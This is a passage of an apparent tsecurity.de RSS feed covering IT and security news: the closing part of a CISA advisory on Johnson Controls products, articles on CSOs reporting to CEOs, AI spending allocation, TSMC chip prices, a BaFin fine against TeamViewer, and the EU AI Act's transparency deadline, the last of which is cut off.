<p>CISA also recommends users take the following measures to protect themselves from social engineering attacks:</p>
<p>Do not click web links or open attachments in unsolicited email messages.</p>
<p>Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.</p>
<p>Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.</p>
<p>No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-07-23</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-07-23</td>
<td>1</td>
<td>Initial Republication of Johnson Controls Product Security Advisories JCI-PSA-2026-07, JCI-PSA-2026-13, and JCI-PSA-2026-16</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[10 survival tips for CSOs who report to the CEO]]></title>
<description><![CDATA[As the CSO grows in prominence, security leaders are increasingly earning a seat at the executive table, reporting directly to the CEO with the expectation to help drive business strategy and ensure organizational success.



Reporting to the CEO unlocks greater access and influence for security ...]]></description>
<link>https://tsecurity.de/de/3685496/it-security-nachrichten/10-survival-tips-for-csos-who-report-to-the-ceo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685496/it-security-nachrichten/10-survival-tips-for-csos-who-report-to-the-ceo/</guid>
<pubDate>Wed, 22 Jul 2026 09:16:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">As the CSO grows in prominence, security leaders are increasingly earning a seat at the executive table, reporting directly to the CEO with the expectation to help drive business strategy and ensure organizational success.</p>



<p class="wp-block-paragraph">Reporting to the CEO unlocks greater access and influence for security leaders, and while CSOs who report to their organization’s CIO still have clout, it’s a very different experience picking up the phone to speak directly with the CEO as a strategic partner.</p>



<p class="wp-block-paragraph">Regardless of reporting structure, CSOs must clearly understand what they are being tasked to solve. That might sound simple, but making the leap to being a CEO’s direct report requires a new perspective, a different set of skills, and a business-level focus on metrics to do so.</p>



<p class="wp-block-paragraph">We asked several current CSOs, CEOs, and IT staffing experts for advice on how security executives can best navigate a direct reporting relationship with their CEO. Offering insights below are <a href="https://www.linkedin.com/in/georgegerchow/">George Gerchow</a>, CSO at Bedrock Data and member of the IANS faculty; <a href="https://www.linkedin.com/in/mattchiodi/">Matt Chiodi</a>, CSO of Cerby; <a href="https://www.cyderes.com/company/about/chris-schueler">Chris Schueler</a>, CEO at Cyderes; and <a href="https://www.skillsoft.com/blog-authors/greg-fuller">Greg Fuller</a>, vice president of the Technology Skills Suite at Skillsoft.</p>



<h2 class="wp-block-heading">1. Understand how the CEO views your role</h2>



<p class="wp-block-paragraph">Most CEOs expect that, when you report directly to them, you fully own your functional area. Whether it’s cybersecurity, operations, or finance, they look to you as the expert in that domain. The CEO may have opinions, but ultimately, you are expected to lead and provide direction.</p>



<p class="wp-block-paragraph">CEOs expect their CSO to be a <a href="https://www.csoonline.com/article/4159317/cisos-reshape-their-roles-as-business-risk-strategists.html">true strategic partner</a>, not just a risk reporter — connecting cybersecurity to revenue protection, regulatory compliance, customer trust, and operational resilience. In turn, CSOs should expect CEOs to treat governance as a strategic enabler, not a bureaucratic necessity.</p>



<h2 class="wp-block-heading">2. Power up on skills vital to your organization at an executive level</h2>



<p class="wp-block-paragraph">On the technology side, AI and machine learning, cloud security, incident response, zero trust architecture, and governance, risk, and compliance (GRC) are the areas where threats evolve fastest and strategic leadership has the greatest impact. </p>



<p class="wp-block-paragraph">Equally important are “power skills”: communication, critical thinking, adaptability, and emotional intelligence. The ability to <a href="https://www.csoonline.com/article/4186984/6-security-leader-tips-for-mastering-business-risk.html">translate complex risk into business terms</a> is what separates a strong CSO from a purely technical one. Skills, not titles, define effectiveness in the eyes of a CEO.</p>



<h2 class="wp-block-heading">3. Take advantage of your direct access</h2>



<p class="wp-block-paragraph">Direct access to the CEO will enable you to influence strategy, <a href="https://www.csoonline.com/article/3855823/how-cisos-can-balance-business-continuity-with-other-responsibilities.html">shape resilience planning</a>, and ensure <a href="https://www.csoonline.com/article/4080670/what-does-aligning-security-to-the-business-really-mean.html">cybersecurity is treated as a business imperative</a> rather than a cost center. That authority is strongest when the CEO understands cybersecurity as a strategic lever, not just a technical function. </p>



<p class="wp-block-paragraph">While a direct reporting relationship gives you access to the CEO, it also comes with the responsibility to operate at that level. You need to provide clear, executive-level visibility into your cybersecurity program.</p>



<h2 class="wp-block-heading">4. Brush up on business translation</h2>



<p class="wp-block-paragraph">A <a href="https://www.csoonline.com/article/4002753/cisos-reposition-their-roles-for-business-leadership.html">CSO who leads with business alignment</a> will always carry more influence when they can translate risk into business language rather than technical jargon. Building programs that must survive an IPO, a FedRAMP audit, and real customer scrutiny forces you to tie security to revenue and trust.</p>



<p class="wp-block-paragraph">The most valuable skill is translation — defining technical risk in terms of executive action and business impact that a CEO and a board can act on. You must build trust through transparency. These are the human skills that complement technology, creating a collaborative human-AI dynamic where leaders make faster, better-informed decisions. </p>



<h2 class="wp-block-heading">5. Treat conversations as risk assessment opportunities</h2>



<p class="wp-block-paragraph">Highly effective security leaders treat every business conversation as a risk conversation in disguise. That mindset is what largely separates a great CSO from a great technologist. Earn the CEO’s trust by speaking business first, security second. Translate every risk into revenue, reputation, or regulatory exposure.</p>



<p class="wp-block-paragraph">Remember, a good CEO wants a translator, not an alarm system. They expect no surprises, a clear read on the risks that matter, and a security leader who helps the <a href="https://www.csoonline.com/article/4021179/8-tough-trade-offs-every-ciso-must-navigate.html">business move faster rather than slowing it down</a>.</p>



<h2 class="wp-block-heading">6. Define what a successful relationship should look like and put it in writing</h2>



<p class="wp-block-paragraph">Regardless of the reporting relationship, start by defining the end goal and putting it in writing. It will evolve over time, but having that initial clarity is critical. This is especially important when you’re new in a role and aiming to make your first 60, 90, or 120 days, and your first year, successful. In such cases, it’s essential to align early.</p>



<p class="wp-block-paragraph">Do that collaboratively, and document it.</p>



<h2 class="wp-block-heading">7. Prioritize trust and candor</h2>



<p class="wp-block-paragraph">The CEO needs to trust that the CSO isn’t sandbagging, and the CSO needs enough psychological safety to deliver bad news fast. When those conditions exist, security becomes a strategic asset — not a cost center.</p>



<p class="wp-block-paragraph">To that end, focus on clear communication above all, and present yourself as part of a team, not a solo player. Stay calm under pressure during incidents, and treat people as peers rather than policing them. The leaders who last build trust before they need it.</p>



<h2 class="wp-block-heading">8. Treat governance as a strategic competitive advantage</h2>



<p class="wp-block-paragraph">The strongest partnerships also share a commitment to governance as a competitive advantage.</p>



<p class="wp-block-paragraph">Governance is the brakes that let you drive fast safely. When a CSO and CEO are aligned on that principle, the organization can innovate with AI while <a href="https://www.csoonline.com/article/4176485/the-ai-governance-imperative-you-cant-afford-to-ignore-2.html">maintaining oversight and protecting against unnecessary risk</a>. The result is an organization that does not just react to threats but builds resilience into how it operates.</p>



<h2 class="wp-block-heading">9. Set clear goals and measure progress</h2>



<p class="wp-block-paragraph">Setting clear goals and measuring progress against those goals is essential. When expectations are clear, the areas you need to focus on become much clearer. It doesn’t solve every problem, but aligning early with your leadership, whether that’s a CEO or a CIO, can significantly reduce the pressure you may feel.</p>



<p class="wp-block-paragraph">Also, never let your boss be surprised. This is where being clear on goals and consistently tracking both leading and lagging metrics becomes especially important, particularly in a direct reporting relationship with the CEO.</p>



<h2 class="wp-block-heading">10. Be willing to endure challenge and discomfort</h2>



<p class="wp-block-paragraph">Finally, persistence and a willingness to endure discomfort for something that matters more than the pain itself are critical to surviving in this relationship. The role of a cybersecurity leader is often thankless. If you’re doing your job well, no one really notices.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI allocation trap: Record spend, vanishing returns]]></title>
<description><![CDATA[In a single month, one enterprise reportedly spent half a billion dollars on AI. A consultant told Axios that the client had handed its workforce AI licenses, set no usage limits and let the meter run until finance noticed. The figure is spectacular, and it is the wrong thing to fear. That half-b...]]></description>
<link>https://tsecurity.de/de/3683786/it-nachrichten/the-ai-allocation-trap-record-spend-vanishing-returns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683786/it-nachrichten/the-ai-allocation-trap-record-spend-vanishing-returns/</guid>
<pubDate>Tue, 21 Jul 2026 15:18:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In a single month, one enterprise reportedly spent half a billion dollars on AI. A consultant <a href="https://www.axios.com/2026/05/28/ai-spending-roi-enterprise-costs">told Axios</a> that the client had handed its workforce AI licenses, set no usage limits and let the meter run until finance noticed. The figure is spectacular, and it is the wrong thing to fear. That half-billion-dollar accident is only the visible part of a quieter, far larger failure. <a href="https://www.gartner.com/en/newsroom/press-releases/2026-1-15-gartner-says-worldwide-ai-spending-will-total-2-point-5-trillion-dollars-in-2026">Worldwide AI spending is forecast to reach $2.52 trillion in 2026</a>, more than any technology category in a generation, and by the most cited measure, roughly 95 percent of it returns nothing. Boards read that as proof that the technology does not work. The evidence points somewhere less comfortable, and it is not a technology problem at all. Most boards cannot see it because they are reading the wrong number: They track failure when the number that matters is allocation. The discipline that separates the winners is not technical. It is how they allocate capital across time, and how willing they are to stop. The hardest discipline in the AI era is not adopting faster. It is allocating honestly and refusing to judge a three-year bet on a six-month cycle.</p>



<h2 class="wp-block-heading">The number everyone quotes, and no one acts on</h2>



<p class="wp-block-paragraph">The headline statistic is now familiar. MIT’s Project NANDA, in its 2025 study <a href="https://fortune.com/2025/08/18/mit-report-95-percent-generative-ai-pilots-at-companies-failing-cfo/">The GenAI Divide</a>, found that about 95 percent of enterprise generative AI pilots produced no measurable impact on the P&amp;L, while roughly 5 percent captured nearly all the value. <a href="https://www.spglobal.com/market-intelligence/en/news-insights/research/2025/10/generative-ai-shows-rapid-growth-but-yields-mixed-results">S&amp;P Global Market Intelligence</a> found that the share of companies abandoning most of their AI initiatives jumped from 17 percent to 42 percent in a single year, with the average organization scrapping 46 percent of its proofs-of-concept before production. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">Gartner</a> expects more than 40 percent of agentic AI projects to be canceled by the end of 2027, citing escalating costs, unclear business value and inadequate risk controls. And the pattern predates generative AI: <a href="https://www.rand.org/pubs/research_reports/RRA2680-1.html">RAND</a> found that more than 80 percent of AI projects fail, roughly twice the rate of comparable work that does not involve AI.</p>



<p class="wp-block-paragraph">Read as a technology story, these numbers say AI does not work. Read correctly, they say something more useful. MIT’s own authors located the cause not in model quality but in a <a href="https://virtualizationreview.com/articles/2025/08/19/mit-report-finds-most-ai-business-investments-fail-reveals-genai-divide.aspx">learning and integration gap</a>. The winners were not running better models. They picked one problem, executed and worked well together. Purchased solutions reached production about 67 percent of the time, while internal builds succeeded roughly a third as often. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-03-31-gartner-forecasts-worldwide-genai-spending-to-reach-644-billion-in-2025">Gartner’s own spending forecast</a> notes the same pivot, with CIOs scaling back ambitious internal builds in favor of commercial solutions that promise more predictable value. None of that is a verdict on the technology. It is a verdict on allocation: What gets funded, for how long and against which yardstick. The popular prescription, heard in every boardroom this year, is to measure harder and prove value sooner. That advice quietly repeats the mistake, because forcing a three-year bet to prove itself sooner is precisely how you kill it. The fix is not more measurement. It is measuring each bet against the right clock and subtracting the ones that miss.</p>



<h2 class="wp-block-heading">The six-month cycle problem</h2>



<p class="wp-block-paragraph">Return to that 95 percent, because the way it is measured is the whole argument. Much of the reported failure is judged on a short clock, with a pilot counted as a failure if it has not shown a measurable financial return within roughly six months. The single most quoted number in enterprise AI is therefore a six-month yardstick applied to every initiative, including the bets designed to pay back in three years. The headline failure rate is not only a measure of AI. It is a measure of impatience.</p>



<p class="wp-block-paragraph">The most expensive mistake in enterprise AI is a timing error. Enterprises have been spending heavily on AI for more than two years, and 2026 is the year boards are demanding returns. The multi-year bets funded during the 2024 and 2025 scale-up are only now far enough along to be judged. When a board reviews an initiative, it applies the yardstick it knows, which is quarterly return. That yardstick is correct for an efficiency project and ruinous for a capability bet. A workflow automation that should pay back in two quarters and a foundational data and agent capability that pays back in three years are not the same instrument, yet they are reviewed in the same meeting against the same metric.</p>



<p class="wp-block-paragraph">This is the heart of the divide. The 5 percent did not simply pick better projects. They judged each project against its own horizon. McKinsey’s enduring <a href="https://www.mckinsey.com/capabilities/strategy-and-corporate-finance/our-insights/enduring-ideas-the-three-horizons-of-growth">Three Horizons model</a> made this discipline standard in corporate strategy a generation ago: near-term, emerging and long-term bets are funded and measured differently. AI erased that discipline because the hype compressed every timeline into the current quarter. The result is two failure modes that appear opposite yet share a common root. Organizations kill three-year bets at month six because they miss a metric the bet was never designed to hit. And they keep funding six-month theater for years because it is visible, safe and never asked to prove a return. Both are allocation failures. Neither is a technology failure.</p>



<h2 class="wp-block-heading">Subtraction is a strategy</h2>



<p class="wp-block-paragraph">There is a second discipline, the 5 percent share, and it is the one boards find hardest. They subtract. Every credible study of the failure rate describes the same chaotic pattern underneath it: Initiatives are <a href="https://www.ciodive.com/news/AI-project-fail-data-SPGlobal/742590/">abandoned late, without criteria</a>, after the money is spent and the credibility is gone. Disciplined organizations do the opposite. They decide the conditions for stopping before they start, and they stop on schedule. Subtraction is not the absence of strategy. It is the strategy. Capital removed from a failing bet is capital available for a surviving one, and the survivors are where the entire return lives.</p>



<p class="wp-block-paragraph">This reframes the 42 percent abandonment figure. Abandonment is not the problem. Undisciplined abandonment is. An organization that liquidates a position the moment it breaches a pre-agreed kill line is practicing portfolio hygiene. An organization that lets a doomed pilot run until someone loses patience is paying full price for a lesson it could have bought at a discount. The 5 percent who won were not smarter. They were patient in the right places and ruthless in the wrong ones.</p>



<h2 class="wp-block-heading">The HALT framework: Horizon, Allocation, Liquidation, Tracking</h2>



<p class="wp-block-paragraph">Treating AI as a portfolio rather than a pile of pilots requires four disciplines, and the organizations that execute well put all four in place before the next funding cycle, not after the next failure. The name is deliberate. The discipline most enterprises lack is the willingness to halt the wrong bets in time to fund the right ones.</p>



<p class="wp-block-paragraph"><strong>Component 1: Horizon. </strong>Classify every AI initiative by its true payoff horizon before it is funded. Horizon 1 covers efficiency plays that should return value within two quarters. Horizon 2 covers capability bets, data foundations, agent platforms and integration work that pays back in roughly 6 to 18 months. Horizon 3 covers transformation bets that take eighteen months to three years or longer. Each horizon carries its own success metric, set at funding time. A Horizon 1 yardstick never judges a Horizon 3 bet. This single rule prevents the most common and most expensive error in the portfolio.</p>



<p class="wp-block-paragraph"><strong>Component 2: Allocation. </strong>Decide the split across horizons deliberately, as a board-level capital decision, not as the accidental sum of whatever pilots happened to win approval. A practical reference point, borrowed from decades of innovation-portfolio practice, is roughly 70% to near-term value, 20% to capability, and 10% to transformation. The exact ratio is yours; the discipline is to choose and defend it. The failure mode is an unmanaged portfolio: 90 percent scattered across disconnected Horizon 1 experiments, with nothing compounding into the Horizon 2 capability that the buy-and-integrate winners actually built.</p>



<p class="wp-block-paragraph"><strong>Component 3: Liquidation. </strong>Attach a kill line to every initiative at the moment it is funded: A named milestone, a date and an owner empowered to stop it. If a bet misses its horizon-appropriate milestone, it is liquidated, and capital is reallocated on schedule without debate over sunk costs. The absence of a pre-agreed kill line is not patience. It is an unpriced liability that the board has almost certainly not been shown.</p>



<p class="wp-block-paragraph"><strong>Component 4: Tracking. </strong>Report the portfolio to the board on a fixed cadence using a single instrument: The AI Portfolio Scorecard. Not a deck of project updates, but a single view of allocation by horizon, burn against milestone, liquidation decisions taken and capital reallocated to survivors. The cadence is the control. A portfolio reviewed once a year is a portfolio managed by hope.</p>



<p class="wp-block-paragraph"><strong>THE AI PORTFOLIO SCORECARD: SCORE EVERY INITIATIVE BEFORE IT IS FUNDED</strong></p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><thead><tr><td><strong>Evaluation criterion</strong></td><td><strong>0</strong></td><td><strong>1</strong></td><td><strong>2</strong></td></tr></thead><tbody><tr><td>Horizon assigned (H1 / H2 / H3) and documented before funding</td><td> </td><td> </td><td> </td></tr><tr><td>Success metric matched to the horizon, not a default quarterly ROI</td><td> </td><td> </td><td> </td></tr><tr><td>Kill line set: Named milestone and date, agreed at funding</td><td> </td><td> </td><td> </td></tr><tr><td>Owner named with explicit authority to stop the initiative</td><td> </td><td> </td><td> </td></tr><tr><td>Fits a deliberate allocation band, not an accidental addition</td><td> </td><td> </td><td> </td></tr><tr><td>Odds-raising path documented: Buy or partner and an integration plan</td><td> </td><td> </td><td> </td></tr></tbody></table> </div></figure>



<p class="wp-block-paragraph"><em>Score each criterion: 0 = not present, 1 = partially documented, 2 = fully verified. Total out of 12. Bands: 0 to 4 = DO NOT FUND  |  5 to 8 = CONDITIONAL  |  9 to 12 = FUND.</em></p>



<p class="wp-block-paragraph"><strong>THE LIQUIDATION GATE: RUN AT EVERY BOARD REVIEW BEFORE CONTINUING FUNDING</strong></p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><thead><tr><td><strong>Review test</strong></td><td><strong>Status</strong></td></tr></thead><tbody><tr><td>Milestone for this horizon met or credibly on track</td><td>PASS / FAIL</td></tr><tr><td>Burn within plan to the next milestone</td><td>PASS / FAIL</td></tr><tr><td>Still fits the allocation band, with no quiet horizon drift</td><td>PASS / FAIL</td></tr><tr><td>Owner confirms continued strategic fit</td><td>PASS / FAIL</td></tr></tbody></table> </div></figure>



<p class="wp-block-paragraph"><em>Any unresolved FAIL = stop funding, liquidate the position, reallocate the capital to a survivor and record the decision on the scorecard.</em></p>



<h2 class="wp-block-heading">The cost of the timing error</h2>



<p class="wp-block-paragraph">The financial case follows the pattern and is consistent. Consider two organizations that funded the same class of Horizon 3 bet: A domain-specific agent platform meant to compound over three years. The first review was conducted at month six against a quarterly return test, found no payback and killed it, booking the write-off as a lesson about AI being overhyped. Its competitor classified the same work as Horizon 3, set an 18-month capability milestone, protected funding through two review cycles and shipped to production within the window the work actually required. One organization spent its money to learn that it lacks allocation discipline. The other spent comparable money and now owns a capability its rival has abandoned and cannot quickly rebuild. The dollars on the two income statements are similar. The competitive positions are not.</p>



<h2 class="wp-block-heading">The governance return the board has been waiting for</h2>



<p class="wp-block-paragraph">Allocation discipline does two things at once. It stops the bleed by liquidating failures on a schedule rather than at the point of exhaustion. And it concentrates capital where the entire return lives, in the small number of bets that survive their horizon. The 5 percent figure is not a ceiling imposed by the technology. It is the current yield of an industry allocated by hype. An organization that classifies by horizon, allocates on purpose, liquidates on a line and tracks on a cadence is not trying to beat the technology. It is trying to beat its own indiscipline, and that is a far more winnable contest.</p>



<p class="wp-block-paragraph">The board conversation about AI returns is coming for every organization, and it arrives the moment the spending outpaces the story. When it does, the CIO will be asked a simple question: Where did the money go? The leaders who can answer will not show a pile of pilots. They will show a portfolio: What was funded, against which horizon, what was liquidated and when, and what the survivors are now worth. Subtraction is a strategy. The only question is whether you are practicing it on purpose or about to learn it by accident.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Expect 2027 iPhones to cost more as TSMC increases chip prices]]></title>
<description><![CDATA[Apple will have to pay more for its iPhone and Mac chips from 2027 onwards, as long-term supply chain partner TSMC is upping its base prices by as much as 10%.Workers at a TSMC facilityApple is already trying to mitigate the memory market's pricing spikes to reduce its costs, but it's not the onl...]]></description>
<link>https://tsecurity.de/de/3683626/ios-mac-os/expect-2027-iphones-to-cost-more-as-tsmc-increases-chip-prices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683626/ios-mac-os/expect-2027-iphones-to-cost-more-as-tsmc-increases-chip-prices/</guid>
<pubDate>Tue, 21 Jul 2026 14:11:39 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple will have to pay more for its <a href="https://appleinsider.com/inside/iphone" title="iPhone" data-kpt="1">iPhone</a> and Mac chips from 2027 onwards, as long-term supply chain partner TSMC is upping its base prices by as much as 10%.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68309-143999-66833-140170-IMG_1913-xl-xl.jpg" alt="Construction workers in helmets and reflective vests stand in a line facing a large building under construction with a prominent red TSMC logo banner hanging on the structure" height="720" class=""><br><span>Workers at a TSMC facility</span></div><br>Apple is already <a href="https://appleinsider.com/articles/26/07/08/apple-testing-banned-vendor-ram-is-a-band-aid-not-a-cure">trying to mitigate</a> the memory market's pricing spikes to reduce its costs, but it's not the only component price problem on its hands. It faces having to pay TSMC even more for the all-important processors too.<br><br><a href="https://asia.nikkei.com/business/technology/exclusive-tsmc-to-raise-chipmaking-prices-by-up-to-10-from-2027">According to</a> <em>Nikkei</em> on Tuesday, TSMC will be increasing the base price of its chips from between 5% and 10%.<br><br><br> <a href="https://appleinsider.com/articles/26/07/21/expect-2027-iphones-to-cost-more-as-tsmc-increases-chip-prices?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/245010?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyberangriff vomJuni 2024: Bafin verhängt 240.000 Euro-Strafe gegen Teamviewer]]></title>
<description><![CDATA[Weil Teamviewer einen Angriff durch russische Hacker nicht sofort an die Börse meldete, greift die Finanzaufsicht Bafin nun durch und verhängt eine 240.000 Euro Strafe welche noch viel höher hätte ausfallen könne. Midnight Blizzard Teamviewer führt Cyberangriff auf russische Hacker zurück (29. Ju...]]></description>
<link>https://tsecurity.de/de/3682530/it-security-nachrichten/cyberangriff-vomjuni-2024-bafin-verhaengt-240000-euro-strafe-gegen-teamviewer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682530/it-security-nachrichten/cyberangriff-vomjuni-2024-bafin-verhaengt-240000-euro-strafe-gegen-teamviewer/</guid>
<pubDate>Tue, 21 Jul 2026 04:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/Computersicherheit/comments/1v1w0om/cyberangriff_vomjuni_2024_bafin_verh%C3%A4ngt_240000/"> <img src="https://external-preview.redd.it/g8ZueBYDjPLPpkTrbjZwTbGji32yA9GRizoQ3i1pb4E.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=8c8244df13324bf2826f1c131e52d77c6e7cfbc2" alt="Cyberangriff vomJuni 2024: Bafin verhängt 240.000 Euro-Strafe gegen Teamviewer" title="Cyberangriff vomJuni 2024: Bafin verhängt 240.000 Euro-Strafe gegen Teamviewer"> </a> </td><td> <!-- SC_OFF --><div class="md"><p>Weil Teamviewer einen Angriff durch russische Hacker nicht sofort an die Börse meldete, greift die Finanzaufsicht Bafin nun durch und verhängt eine 240.000 Euro Strafe welche noch viel höher hätte ausfallen könne.</p> <p><a href="https://www.golem.de/news/midnight-blizzard-teamviewer-fuehrt-cyberangriff-auf-russische-hacker-zurueck-2406-186563.html">Midnight Blizzard Teamviewer führt Cyberangriff auf russische Hacker zurück</a> (29. Juni 2024)</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Horus_Sirius"> /u/Horus_Sirius </a> <br> <span><a href="https://www.golem.de/news/cyberangriff-bafin-verhaengt-240-000-euro-strafe-gegen-teamviewer-2607-211071.html">[link]</a></span>   <span><a href="https://www.reddit.com/r/Computersicherheit/comments/1v1w0om/cyberangriff_vomjuni_2024_bafin_verh%C3%A4ngt_240000/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[The EU’s AI transparency deadline is weeks away. Is your enterprise ready?]]></title>
<description><![CDATA[Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.



To assist in the effort, the European Commission (Commission) has published guidelines to help AI deployers get in line with the AI Act’...]]></description>
<link>https://tsecurity.de/de/3682527/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682527/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</guid>
<pubDate>Tue, 21 Jul 2026 04:02:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.</p>



<p class="wp-block-paragraph">To assist in the effort, the European Commission (Commission) has published <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1653" target="_blank" rel="noreferrer noopener">guidelines</a> to help AI deployers get in line with the AI Act’s transparency obligations, which will begin to go into effect on August 2.</p>



<p class="wp-block-paragraph">After that, companies providing AI systems must alert users when they are interacting with AI. They must also tell users when they have been exposed to deepfakes, “emotion recognition,” or biometric categorization systems, or when they are given AI-manipulated content in matters of “public interests without human review or editorial control.”</p>



<p class="wp-block-paragraph"><a href="https://commission.europa.eu/about/organisation/college-commissioners/henna-virkkunen_en" target="_blank" rel="noreferrer noopener">Henna Virkkunen</a>, the Commission’s executive VP for tech sovereignty, security and democracy, said in a statement, “with today’s guidelines, the Commission supports the smooth and effective application of the AI Act to make AI systems interacting with people such as chatbots and AI agents and AI content more transparent and trustworthy. These guidelines support providers and deployers in meeting their obligations under the AI Act, while helping citizens know when they are interacting with AI.”</p>



<p class="wp-block-paragraph">Systems must include machine-readable markers to reveal such content, to reduce “the risk of deception and manipulation” and build public trust in AI.</p>



<p class="wp-block-paragraph">“Generative systems have collapsed the cost of producing convincing content while the cost of judging it stands where it always stood,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. This requirement is “an attempt to restore friction to that imbalance.”</p>



<p class="wp-block-paragraph">A company’s non-compliance could result in fines anywhere from €750K (about $856K) to €15M (about $17 million), or even up to 3% of its total worldwide annual revenue.</p>



<h2 class="wp-block-heading">Transparency requirements</h2>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/2096040/what-it-leaders-need-to-know-about-the-eu-ai-act.html" target="_blank">EU AI Act’s</a> transparency requirements apply to “natural or legal persons,” public authorities, agencies, or other bodies that develop AI systems, or have them developed, and place them on the EU market or into use under their name or trademark. This means all companies, regardless of whether or not they are EU-based.</p>



<p class="wp-block-paragraph">“Systems placed on the European market, put into service there, or producing outputs used there are inside the field, wherever the developer sits,” Gogia noted.</p>



<p class="wp-block-paragraph">Applicable systems must be intended to interact directly with “natural persons”; these systems include AI-enabled chatbots or conversational agents, AI companions, or coding agents. However, AI-enabled tools like recommender systems, spam filters, authentication, search and retrieval, transcription, text and code auto-completion, or predictive maintenance do not fall under the rule.</p>



<p class="wp-block-paragraph">Specific outputs such as AI-generated text, images, video, and audio must contain a machine-readable mark. Deepfakes and public interest-related text created by AI without human review or control must be clearly labeled, however, deepfake content that is “artistic, creative, satirical, or fictional” is largely exempt.</p>



<p class="wp-block-paragraph">AI content must be marked with one of three labels: “AI,” “Fully AI-generated,” or “Partially AI-modified.” For instance, “Fully AI-generated” applies when news summaries, music, art, or videos have been created without any human oversight (apart from prompting), while “partially AI-modified” could mean a person’s face is swapped into an authentic photograph to create a deepfake.</p>



<p class="wp-block-paragraph">The three icons are publicly available for free use; enterprises can download zip files in <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129547" target="_blank" rel="noreferrer noopener">PNG</a> and <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129546" target="_blank" rel="noreferrer noopener">SVG</a> formats.</p>



<p class="wp-block-paragraph">Most of the <a href="https://www.cio.com/article/4032894/analysis-of-the-european-ai-regulation-one-year-after-its-entry-into-force.html" target="_blank">Act’s transparency rules</a> begin to go into effect on August 2. But AI systems placed on the market before then will have some leeway; they must be in compliance by December 2.</p>



<p class="wp-block-paragraph">However, a four-month allowance “on one obligation, for one population of systems, contingent on one procedural step, is not a strategy,” Gogia emphasized. Enterprises should plan to comply by August 2 and “treat any relief that arrives as margin.”</p>



<h2 class="wp-block-heading">A consistent code of practice</h2>



<p class="wp-block-paragraph">Along with the transparency guidelines, the Commission has introduced a <a href="https://digital-strategy.ec.europa.eu/en/policies/code-practice-ai-generated-content" target="_blank" rel="noreferrer noopener">code of practice</a> that essentially serves as a gesture of good faith. When signed, it can provide “legal certainty” and a “simple and practical” way to demonstrate compliance with the <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">AI Act</a>, according to the Commission. Signatories can also collaborate through the ‘Signatory Taskforce,’ which will share practices and advance technologies around marking and labeling practices.</p>



